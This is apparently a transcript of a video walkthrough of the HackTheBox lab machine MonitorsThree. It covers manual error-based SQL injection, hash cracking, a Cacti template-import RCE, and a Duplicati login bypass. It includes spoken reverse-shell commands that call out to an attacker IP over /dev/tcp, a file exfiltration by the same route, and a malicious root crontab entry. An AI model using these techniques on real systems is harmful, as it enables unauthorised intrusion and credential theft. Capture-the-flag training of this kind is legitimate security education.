What's going on YouTube? This is IPSEC, and today we'll be doing MonitorsThree from HackTheBox, which starts off with an SQL injection that forgot password feature of the website, but since the field doesn't reflect any data back to the user, union injection isn't really going to be beneficial here. I think most people just use SQLMap, which will default to Boolean injection, which is relatively slow, and you don't learn that much by just throwing SQLMap at it. So we'll be doing it manually, but taking advantage of the fact that it reflects the error messages back to you, so we can use error injection to craft a SQL query that will put the data we want in an error message. After doing this, we can extract all the hashes from the database, get some credentials, and log into a CACTI instance, which enables us to exploit a CVE that lets us write PHP files when importing a template. This gets a shell in the box, and we've discovered duplicati is running on it, and that has a weird login process. We'll look at the issues on GitHub, find a way to do a auth bypass by reading the server passphrase on the server, and that gets us in, and then we can just create a backup job to back up a malicious crontab entry and then restore it, getting a shell on the box. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats by the nmap directory and call it monitors3, then the IP address of 10.10.11.30. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx, also running on Ubuntu. And the HTTP title nmap script tells us it's redirecting to monitors3.htb. So let's go ahead and add this to our host file. So sudo v etc host. And then we can add 10.10.11.30 monitors3.htb. Save that. And let's see, nothing really interesting there. Then we also have port 8084 is filtered. And what the filter means is this port is behaving unlike like port 80 and let's say 81 or anything else that doesn't respond here. So all the ports that aren't listening most likely are sending a TCP reject when we send the SYN, and that tells us the port's not open, right? Port 8084 isn't sending us the SYN ACK back or the reject. It's just eating the packets most likely. Or maybe everything's eating the packets and 8084 is sending the reject. But standard behavior on Linux is to send a reject message when you connect to a port that isn't listening. So this dropping it probably means there's a firewall rule in place for port 8084, and maybe that is listening for a different IP address, localhost, things like that. Not really important right now, just something to keep in mind. So let's go ahead and take a look at the website. So we'll do HTTP monitors3.htb, and I think I added this in my host file. We have to turn nmap's proxy intercept off. And we get the page. We have the best monitoring solution. So the very first thing I like doing is looking at the source code and glancing if I recognize any HTML. Maybe I see like a WP dash that says it's WordPress, but nothing really sticks out. So the next thing I look for is links on the page, and I see login.php, so I know this is going to be a PHP website. If I was doing a dirbust, I would add a -x PHP, so it just also looks for PHP scripts. I'm going to do a virtual host brute force because we do know the domain is monitors3.htb. So I always like starting off with a vhost because it's much quicker. So I'll do gobuster vhost-u monitors3. We'll do opt seclist discovery DNS subdomains top million 5000.txt. And then we'll specify the out file of vhost.out. And we'll just let that run while we look at other things. So let's see. Scrolling at the page, I don't really see anything too much. We have a potential email address here. If we look at login, we have login to account, so we could try like admin, and we get invalid credentials. We could try a username that probably doesn't exist, so I'll do like ipsec password. And I'm just looking at this error message to see if it changes. It does not, so we can't enumerate valid usernames from this. If we go to forgot passwords, we can try like admin, and it says it sent the password request. If we try a different username, it says unable to process request. So this is a way we can enumerate valid users. So if we wanted to, we could copy those requests over to a tool like fuff or wfuzz and then fuzz it and get a list of all the users on the website. But before I do that, I like fuzzing the parameter a little bit. So if I put a single quote here, we do see there is a SQL error. So we know we have SQL injection right here. We could do a single quote, then a comment, and that gets rid of it. We could try for a union injection. So we could do like union select one. And we get the statement has a different number of columns. So we want to know how many columns this has. To do this, I normally don't use unions. I always go with order by because it's just a bit quicker and easier. So we do order by 1, it works. And then if we do order by, let's say 99, it's going to fail here, right? Because there's not 99 things it's ordering by. So the first field's probably going to be ID. The second field's probably going to be like username. Third field, maybe like email, password, something like that. We don't need to know the name. We just need to know how many it is so we can get our union injection working, right? So I'm going to go ahead and send this over to Burp Suite because it's a bit easier to work with in the repeater tab. It does go to a 302 found, which is a bit annoying. You could collect the follow redirect, but we'll do that automatically in just a second. I like just copying something from around the data I want to look at, putting it here, and then we change this to auto scroll. So whenever we make a request, I have to go back real quick. There we go. We actually send the data. And we have this 302 found. I can click on the gear in the top left, and then we go to follow redirects always. And now when I send this, it's going to follow that redirect, go down, and we can see this. So here we just want to increment this until we see it doesn't successfully submit the password request. At 9, it's getting a lot of fields, so it's probably a select star, but there's no 10th column in this, so we know there's probably going to be 9 fields. So we could do the union injection now. So we do union select 1, 2, 3, 4, 5, 6, 7, 8, 9. And the issue we have is it's not reflecting any of the data in any of these columns back to us. So even though it sent the password request, like we did this union injection, none of these fields send data. So union isn't really going to help us all that much, right? Even if we give it an invalid username, nothing happens, right? So we can't extract data from a union injection. We could do like a Boolean injection and extract things one character at a time, but that is going to be so time consuming. That's something that's better left for like SQLMap. If you wanted to, we could send this over to SQLMap. So we just go with like a star here, and that's going to tell SQLMap to fuzz that parameter or test that parameter, not fuzz. Copy the file. Let's do forgot password dot request. Save that. We can go here. And the vhost scan discovered one subdomain that is CACTI. So let's real quick add this to our host file. So let's do cacti.monitors3.htb. There we go. So if we do less on this, I just want to make sure it copied correctly. We can do SQLMap dash request, forgot password. Then we want to specify dash dash batch. So it just automatically goes through everything, and I've got it saved. So let's just remove this directory real quick. And it's going to run through SQLMap. So what you saw before is I've done this box previously, and SQLMap had saved all the results, so I didn't have to do any testing. But I'm not actually going to use SQLMap because there is a quicker way we can do this manually, and that is through error injection, right? So if we have a SQL error, so I'm just going to leave this at admin and then single quote, we can see unable to, it's probably because it's using like SQLMap slowing the database enough where all the queries are failing. That is annoying. That is something we do come across. So I'm going to kill SQLMap. You could run it. I know this works. There we go. So we get connection failed, syntax error. We get an error message. So we can craft an error message that's going to return what we want to see. So we'll do a and then the common thing we use is extract value. And this is just a weird function in SQL, in MySQL that lets us cause errors. I don't know the exact purpose. It's something to do with like XPath, right? If we do extract value MySQL, we have to turn intercept back off. You can see what this is. It's something to do with like XML stuff. I don't actually know the purpose of it. I just know I always use it with my error-based injections, right? So we'll do extract value, and then you always want to do concat and then put a like value that is non-compatible here. We'll show why later on when we're doing this, but this definitely makes the injection much more reliable, starting it with a invalid character. So do that concat, and then we can do anything we want. So I'm going to do a select ipsec here just to test it out. So we do 3 parentheses to close it, and then a comment, and you can see syntax error ipsec, right? So this is where we can actually get stuff out of the database. So if I wanted to, let's go with the information schema table. So we'll do information schema MySQL. It's been a while since we've had to do manual SQL injection, but it's relatively straightforward. I always have to go back to these tables for references to see exactly how it works. The first table I like doing is the schemata, because this is going to give me the database name. So we can do schema name. So we'll do select schema name from information schema dot schemata, and then I'm going to do a limit 1. So this is going to get me the very first one. And no shock, it's information schema. If we just do limit 2, we returned more than one row. So I'm going to do a comma 1. So this is going to be 0, 1 gives me the very first entry, 1, 1 gives me the second entry, and 2, 1 errors out. So there's only 2 tables here. And this column is how many rows to return, right? So if I do 2, we get that error again. So at 1, 1, we know the database is MonitorsThree DB. So I'm going to say where schemata is equal to this. I think the name's actually not going to be schemata in the next thing we do. So let's look at the tables. Nope, not the views table, the tables table. We want table schema. That's what the thing is. So we'll do table schema is equal to MonitorsThree. This is it tables or table? Tables. And we want the table name. So the first table we have, or that's the second one. The first one is going to be invoices. Then we have customers, then changelog, tasks, invoice tasks, users. So we probably want the users table, right? Because our goal right now is extracting credentials. So we'll do where table schemas is equal to that, and table name is equal to users. And then you can guess, we're going to go to the columns table next, and I'm going to guess it's column name from information schema. Let's just try this first. If not, then we'll go back to the docs and see. So ID is the first one. Then we have username, email, password, name, position, date of birth, start date, probably end date, or salary. And then 9, we don't get anything. So we probably want the username and password, right? Username, password there. So I'm going to send this to a new pane just because I always like keeping this one here with information schema. So we'll call this info schema. And this will be data, right? So we can get rid of this complex thing and we can just say select. We'll do username from users, limit 0, 1, like that, right? That looks good to me. We'll have to redo our redirect follow. So follow redirects always, send it, scroll down. First user is going to be admin. That's no shock. Grab this, and then we're going to say the auto scroll. There we go. So we have admin, then D Thompson. I guess we should save all these. So let's go v users.text. We'll do I'll call it creds.text. D Thompson, admin. I'm going to do colons. The next one is J Anderson. Then we have, let's see, M Watson. And do we have any more? 4, nothing. So we have those 3 users, or for users, I should say. Now let's get the password. So I'm going to do select password from users, and we have ... because the XPath is limited to 32 characters. And this is most likely going to be 32, but we added one character right here. So I'm actually going to show why that 0A comes in handy now, because this is a good spot to do that. So we'll do auto scroll, auto follow. So if I got rid of this concat, right? So we can get rid of that, get rid of one quote here. We can see we get the full hash. So this is the full hash of the admin user. There we go. So let's go to the second user. Unable to process. Go to the next one. We have this. So we can add this hash. Then let's go for the next one. So what happened here is the extract value query did not fail for D Thompson. And that's why we just get the unable to process request. This is what happens when we have an invalid username. So maybe the password is blank, or maybe for some reason the hash just doesn't cause this extract value to error. That's why we're always putting the concat beforehand, right? Because putting the invalid character means extract value is always going to fail. So if we try to change this to 1, we get majority of the hash, but we're missing the last character, right? So what we do in this state, like portion or state, whatever, is we use the substring command. So we can do a select, and we'll say substring password, and then we're going to get the first character. Let's go all the way to, we'll do character 20. We could probably go up to like character 31, right? But we're going to get the first 20 characters. So we can put this here. And then I'm going to say, let's go for character 21 to 40. Let's get the next 20. And then grab this and paste. So now we have the full password hash, right? So we could do D Thompson like that. And we have a list of all the hashes. So since these are just 32 characters, I'm going to guess they're MD5 sums. So I'm not even going to bother using hashcat. I'm just going to go to crack station, right? So let's cat our creds. And then I'm going to do a awk on the field separator of colon, print 2 to get the second one. And now we have a list of all the MD5 sums. We can copy this. Then let's go to crack station and attempt to crack this. So put this here, or I guess we're not attempting to crack, we're attempting to look up, right? After we verify we're not a bot by selecting all the buses. Come on, that's a light, there's a bus. Okay, crack caches. And unrecognized hash format on 2 of these. I think maybe we pasted wrong. Let's see. Admin echo-n WCC 30 characters. What? Am I not getting? Huh. Let's go back. Let's go here. 01. What am I doing wrong there? Password 31A. I guess the XPath just isn't showing me the 31 character. That is bizarre. And then this doesn't. Okay. So we do 120. We got up to DA. Let's just grab this. So I guess data validation is important. That's not it. 120. Grab this. Paste. Okay. Now let's grab 21 to 40. Copy that. And paste. We did D. Thompson. Let's just do the next. That looks good. Let's see. So I think J. Anderson's good. M. Watson's not. So that would be 0, 1, 2, 3. So if we go 3, grab the first set, then we can grab the second set. Okay. So hopefully all of these, let's do a for in echo dash n I WCC done. We've got the do. This one hash is missing one. I don't think the hash is important. If I was doing this box for the first time, obviously I would go and fix that, but I don't need to waste a couple of your minutes just making sure everything's perfect. Yeah, one is missing a character. That's fine. Send this. We'll delete the bad hash. I'm not a robot. Crack. And 31A is green cacti 2001. So let's go in our creds, and we have a password there. So we can go back to the login. So if we go back here, it was login.php. We can go admin and then put that password, and we get logged into this interface. Now, clicking around, we do view statement. We're not sending anything. It just went back to the dashboard. So this looks like it's very like static, right? If I turn this on intercept mode, we change these things. There's no save button. So even if there was, I'm interacting with the database still. So nothing really is going on here. We can go to invoices. And what I'd be looking for here is a way to like print an invoice, because then I'm going to a PDF parser or something like that. But there's nothing there. So right now we don't have any functionality that's not using the database. So it's like even if we found a exploit here, it doesn't give us anything, right? Maybe we could try changing the number of column results we show and get another SQL injection. But again, what do we get with that, right? Nothing. We could look at the change log, but nothing really here. The only thing we could really do potentially is revisit the SQL injection and maybe like select load file. Is it load underscore file, I think? And then etc pass WD or something like that. Unable to process. So yeah, that's an error. So we can't really even extract files because we probably don't have that permission, right? So there was, doing our vhost scan, a cacti.monitors3.hdb, and our password was greencacti2001, right? So that kind of points us to going over this host. I thought I had in my host file sudo v etc host. Maybe I typoed it. So let's go ahead and paste this. Yep, I did cacti, not cacti. Refresh. Burp Suite has my DNS cache, so I'm going to disable it. And then hopefully by the time I need it again, the DNS cache will be undone. We have the version of CACTI. So we can Google this real quick. If we Google CACTI 1226 exploit, go over to Google. We have an RCE vulnerability, and it looks like everything is pointing to this RCE, right? And they're talking about it. It looks like it happens when you're importing a template. So we have some PHP code here that's going to create a template, but we have to log in first. So let's go ahead and try the credentials we got. Where is the login? Right here, admin, and then I think it was green cacti 2006, maybe 2001. 2001 is what we had. And then where did it say to go? Let's close some of these tabs. There we go. Import, export, import packages. So let's go import packages. And then we have to create a file. So I'm going to copy their POC. And I'm going to do v, we'll call this cacti.php, paste. And you may think right away, oh, we just edit the system command, but this is running on our box. And we're going to create this test.xml.gz file, right? So I'm actually going to get rid of this RM so we can look at the test.xml just to see what it looks like. But it's going to put this PHP info in file data, which probably goes right here, right? And it's creating the file resource test.php. I'm going to call this shell.php just so we can see that changes. Let's go run a system command, and then we'll do let's do single quote. Then I'm going to do echo. Let's create a reverse shell real quick. --i dev tcp 10.10.14.8 9001 0 and 1 base 64 w0. And we can copy this. And I like just doing this in base 64 because we can get rid of so many bad characters doing it this way. And most systems will have base 64 on it, right? So we can do system with that command. nclvnp 9001. So we're listening. And if we run this file, it now gave us the file we upload here. But if I look at test.xml, this is just what CACTI uses to import, right? I don't know the public key signature, but that's what the file looks like in the gzip. So let's go over to the console, select a file. Let's go to HTTP. This box name is MonitorsThree. Specify the GZ file. You can see it's going to upload to cacti resources or resource shell.php. So let's do import. It has been successful. So let's go to this page because we can see we don't have a shell yet. Hit the page and magically we do. So now we have a shell on the box. Let's just do python 3-c import pty spawn bin bash because we want to upgrade our shell to be slightly better. stty raw minus echo foreground enter. And then we can clear the screen after we do export term is equal to xterm. There we go. So let's see. The very first thing I always like doing is dumping the database, right? We already dumped all the users on the main web page, but Cacti probably has its own database. So let's see. Is there like a config.php find.grep config? Yep. Include cat config.php. Let's see. grep-i user. So we have cacti user. And let's do, let's see. We'll grep-i database underscore because we see that's what it's being used for. Let's see. Password is cacti user. Okay. So we can do MySQL -u cacti user -p. Put the same thing in and show databases. Use cacti. Show tables. And then we can do, let's start with the describe user. That table. Let's see, user underscore auth probably. Okay. So we probably just care about username and password, right? So we'll do select username, password from user auth. And there we go. So we have 3 credentials. So let's just grab these and then we're going to format them on our box. So I'm going to v cacti.users, call it .text. Let's get rid of all spaces and then replace the type character with a colon. Oh God. I'll do that manually. I think I forgot to escape the pipe or something like that. Okay, so there we go. We have a list of users like this. So we can go over to Hashcat. And I always like running hashcat on a separate box, but you can run on your host. The reason why I do it a separate box is I'm recording the video, and hashcat could make me like drop frames and do things like that. So always keep that separated. So I'm going to do v hashes. I'm going to call this monitors3, paste this, and then we can do /hashcat. Hashes monitors3. We have to specify, gave it usernames, and we'll do opt word list rocku. Is just dash user. There we go. What the user flag does is tells it we gave it a hash file that has username :password, right? We have multiple hashes that match. We'll do mode 3200. I have a typo there. There we go. And now it's going to start cracking. Hopefully it doesn't take too long. We'll see if we get any results quickly. Let's see. It's initializing the devices. And we have started, and right off the bat, we have one that cracked, right? 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. So I'm going to actually quit this. We don't have to run for everything. I probably would if I was doing the box the first time, but I just want to show if you have the users flag in, you could do the -- show. And hashcat, we have to also specify the format. Hashcat will give you the username and the password. So we know Marcus's password was this, right? So we could go v creds, we'll do Marcus and then the password. And I guess I should have specified like where these came from. Main website DB. This will be CACTI DB. I probably should have put the hashes in this, but oh well. We have Marcus. And if we go back to a shell, we do cat etc passwd. I like grepping for everything that ends in sh because that's going to be shells. Marcus does have an account. So we could try ssh Marcus at 10, 10, 11, 30. And permission denied. Let's try su-Marcus. And then 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. And we get logged in. And I don't think you actually need Marcus to do this box. It's a good like save point, and also you get your SSH, which makes you allow you to do like the reverse shell a bit, or not reverse shell, port forwarding a bit easier, which we'll do in a minute. But if you didn't ever find Marcus's password, you could probably use Chisel and still complete the box, right? So if we look at ID RSA, let's just get this back over to our box, and then we'll use this SSH key to log in, because I'm guessing SSH is configured to prevent passwords, so that's why it denied us right away. But if I do Marcus dot, I'll call it, forget what the SSH extension is. We'll just call it what I did, SSH, chmod 600. Probably PEM. I should probably Marcus. I think PEM is the common format. Marcus PEM, Marcus at 10, 10, 11, 30. And there we go. We get logged in. So the most common way to privask is always just exploiting a process that's running as a different user. And the easiest way to find that normally is with like a ps command. You can look at all the processes, but it looks like hide PID is configured on this. So we can only look at processes owned by us. You can verify that by like catting etc fstab and grepping for probably hide. We can see proc is mounted with hide PID equals 2. So we can't look at processes running from other users, but we can do SSLNTP and look at ports that are open, right? And we see port 8084. This is the one that was on our nmap way at the beginning of the box. If we go back to the nmap results, we can see that is filtered. We see it's listening on all hosts. So there's probably an IP tables rule blocking us. We could probably do etc IP tables rules.v4. And let's see, we see, where's 8084? That's a Docker one. Let's see, grep 80. We can see it is configured to drop. And then we also allow localhost to access it. So the reason why I did the file here, because if we do IP tables -L, that requires permissions, but most of the time the default configuration for the persistent file is actually open, surprisingly. Probably shouldn't be, but there you go. You can see anyone can read this file. So whenever I go and look at the firewall, I normally look at that. If we look at rules v6, actually, I wonder if this is a thing, right? There are no rules here. SSLNTP. Are we listening? I don't think it's listening on, it's only listening on IPv4. So I was wondering if we had IPv6 and we found the address, if we could still access it, but it does not look like that's the case. Let's double check that real quick. Let's see, IPv6 address. There is none, right? Actually, we may need IP-6 address, address-6. I think it's -6 address, right? I don't think IPv6 is configured on this box, so that's why we can't access it. Okay, so let's forward port, what was it, 8084? Let's do that, SSLNTP, 8084. So I'm going to hit enter, and after I hit enter, I'm going to do squiggly C, but if it's the very first thing on the line, SSH will hide it and drop you into this menu. And I'm going to forward, let's do 8084, 127.0.0.1, 8084. Okay. And now on my local box, if I go localhost 8084, it should go through my SSH tunnel and go to the other end. I'm going to try 127.0.0.1. Control 127.0.0.1, 80. So that just hangs. Let's try 8200. Okay, so it looks like 8084 may not be a web port, but 8200 is. So let's go ahead and now forward that port. So we'll do the same thing, -L, 8200, 127.0.0.1, 8200. And let's try 8200. And there we go. Duplicati. And it wants a password. So we probably want to find every file that has duplicati in the name. So I'm going to do find /-name. I wonder if this is case sensitive. I'm going to do lowercase first, stir, and then hide error messages. So to dev null. And we'll see if we have any files here. We have backups. We have an etc cron. And we have an opt directory. So if we go opt duplicati, config, and then we have a SQLite database. We don't have SQLite on this box, so I'm going to copy it over to my box, and then we can dump the database. So let's do nc lvnp 9001, direct that to duplicati.sqlite, and then I'm just going to cat this file, and then pipe it over to dev tcp 10.10.14.8 9001. That's going to send the file. I'm going to do SQLite 3 duplicati.dump. And let's see. Do we have any like passwords? We have server passphrase, passsalt, tray icon. We look at this. Let's do echo base64-d. I don't think that's going to be the passphrase, right? We could try pasting this in to see if it is. Copy, paste, sign in, unauthorized. So at this point, we should find any like vulnerabilities. And a good way to do that also, we could go and just Google search it, but I'm guessing we'll definitely find it with that. At the time of doing the box, I think the way was looking at GitHub, so that's why I'm going to show it this way. Let's see. I'm going to search for like bypass to see if we have anything. Not working. Remove. Bypass duplicati login using DB server passphrase. And the odd thing is, this environment info is actually wrong. I think it leaks what version duplicati is running. If not, we can find it from the files on the box. But a later version is, I think it's 2.0.8. I think they were just off by one version here, but not really that important. It's talking about how it does the login, and it's a little bit weird. We look at it, it sends like the encrypted value back. So let's look at this login process real quick. Intercept on, Go here, duplicati login. We'll do password. We want to intercept this. So when I click sign in, it makes a request to get nonce. And then I'm going to intercept the response to this file. So we'll do intercept response. And that sends us this data back. So we got the nonce, the salt. Then we send a encrypted form of the password, right? And I guess if it passes that, then it just magically works. So we have all the secrets, so we can pass that crypto chest. And that's what this blog post is saying. Where is it? This one right here. So we got it. Grab the server passphrase. We're going to open up Burp Suite, go to duplicati login, enter any password, intercept, and we want to analyze nonce and salt. So let's do this again. So I'm going to turn intercept on. And then we're going to do please subscribe, intercept. And then we want to intercept the response to this request. We have the nonce and salt. So let's go and dump again. SQLite 3, duplicati, dump, less, salt. Let's see. Where are the values? Here we go. So we have the salt XTFY ends in 0i, XTFY 0i. So the salt is the same. And then what the blog post wants us to do, we verified it is, convert the server passphrase from base64 to hex. So let's go ahead and grab this passphrase again. And we're going to convert this to hex. So I'm going to do echo this. We want to do probably -n, base64-d, xxd, and then we'll do a -p. And then we'll grab both of these. There's probably a way to put this all on one line, but short enough to do it manually. There we go. And how does it want us to do this? So convert it from base64 hex, open, and then salted. Wants us to do stuff in JavaScript. So let's go F12, console tab, and then var salted password. Paste that. Grab this back off our box. Copy, paste. Okay. Make this bigger. So we created the salted password. Then it wants us to do the nonce password. So we'll grab this. Paste. And let's see. We need to do the nonce from burp. I'm surprised they don't use crypto.js and just have us do the salted password that way. Because we probably don't need to like manually create the hex format. We could just use JavaScript to do it like they're doing here. So we already got salted password. Okay. We do nonce pwd, nonced, and it tells us to put this back in the value. So there we go. Right? Yep. And now I think the password we just forward, right? Forward and modify the password parameter with the nonce pwd. URL encoding it. Oh, shoot. I screwed up. I want to do the last one. I didn't want to modify the nonce in the last one. I don't think. Let's see. It looks like it still worked. Okay, so I guess I did it correctly. Okay, there we go. We get logged in. And then here we just have to find a way to get like code execution on the box. And if we look at this, if we go to restore, we can restore from a backup. And then we tell it where. The storage. Let's see. I'm just looking at exactly how this works. App duplicati. Did that exist here? Hold on. Let's see. Where's my SSH? There it is. There is no app. So I'm guessing right now, duplicati is running in a Docker container because there's directories here that don't exist. If I go to the source directory, then we're in a different thing. And this is probably where mount, yeah. So we have opt duplicati. So we're probably in a Docker here. The parent file system is the Docker one, then they're mounting the Docker with the host file system. And let's see, we can change where we want the backup location to be. Go next. I don't know the encryption password for that, so I can't go forward. Let's just add a backup real quick. So going to configure a new one. Let's call this, I'll call it RCE. I'm going to disable the encryption so we don't have to type that password every time. And then we're going to specify source, home. We can specify anywhere. Let's just do Marcus real quick. And we're going to back up files and we're going to restore a malicious file. And I'm going to copy Etsy crontab over here. And we're going to restore a malicious crontab because this is an easy way to get code execution, right? So I'm going to run every minute as root. And then we're going to do bash-c, bash-i, dev, tcp, 10.10.14.8, 9001, 0, and 1 like that. Okay. nclvnp, 9001, so we're listening. Okay, so we back up that up. Source data. Let's try this again. Let's see. Source. Home. Marcus. We can run the backup, yeah, anytime. Save it. So we have our backup. I'm going to click run now. There we go. We have it ran. I'm going to go to restore, direct restore from backup file. Oh, let's specify the actual file. We'll specify RCE. This is easier to do. And then what file do we want to restore? I'm going to restore the cron tab. And then we're going to pick a location, the folder path. So let's go to browse real quick. Where's source? And then Etsy. There we go. That's the folder we want to. We'll overwrite if it exists. Restore. Restoring complete. So if I now cat Etsy cron tab, we can see ours has been placed. If I do date, we can see it was a new minute right when I did that, and we got a shell as root. So that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.